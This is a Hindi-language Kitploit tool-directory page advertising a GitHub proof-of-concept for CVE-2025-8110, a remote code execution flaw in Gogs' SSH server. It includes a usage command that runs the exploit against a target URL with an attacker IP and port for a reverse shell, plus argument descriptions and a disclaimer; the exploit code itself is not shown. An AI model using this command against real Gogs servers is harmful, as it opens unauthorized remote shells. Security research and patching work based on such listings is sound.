Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
gogs-CVE-2025-8110 — CVE-2025-8110 PoC | Kitploit
उपकरण/GitHubGitHub/zabuqasem/gogs-cve-2025-8110
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubzabuqasem/gogs-cve-2025-8110

gogs-CVE-2025-8110

CVE-2025-8110 PoC

रिपॉजिटरी देखें
2928 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gogs CVE-2025-8110 PoC

इस रिपॉजिटरी में CVE-2025-8110 के लिए एक प्रमाण-परीक्षण (PoC) शामिल है, जो Gogs में एक रिमोट कोड निष्पादन (RCE) भेद्यता है। यह शोषण आंतरिक SSH सर्वर कार्यान्वयन को लक्षित करता है, जिससे हमलावर sshCommand कॉन्फ़िगरेशन के माध्यम से दुर्भावनापूर्ण कमांड इंजेक्ट कर सकते हैं।

उपयोग

शोषण चलाने के लिए, लक्ष्य Gogs URL और रिवर्स शेल के लिए अपने सुनने वाले होस्ट/पोर्ट के साथ CVE-2025-8110.py स्क्रिप्ट का उपयोग करें।

root@kitploit:~
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>

तर्क

  • -u, --url: लक्ष्य Gogs इंस्टेंस का बेस URL (जैसे, http://localhost:3000)।
  • -lh, --host: वह IP पता जहाँ रिवर्स शेल को वापस कनेक्ट करना चाहिए।
टूल डाउनलोड करें
  • -lp, --port: वह पोर्ट जहाँ रिवर्स शेल को वापस कनेक्ट करना चाहिए।
  • -x, --proxy: (वैकल्पिक) डिबगिंग के लिए http://localhost:8080 पर एक स्थानीय प्रॉक्सी का उपयोग करें।
  • कानूनी अस्वीकरण

    यह प्रमाण-परीक्षण (PoC) केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उद्देश्य सुरक्षा शोधकर्ताओं और प्रशासकों को CVE-2025-8110 भेद्यता को समझने और कम करने में मदद करना है।

    लेखक इस कोड के किसी भी अनधिकृत या दुर्भावनापूर्ण उपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस उपकरण का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। इस कोड का उपयोग करके, आप अपने कार्यों की पूरी जिम्मेदारी लेने के लिए सहमत हैं।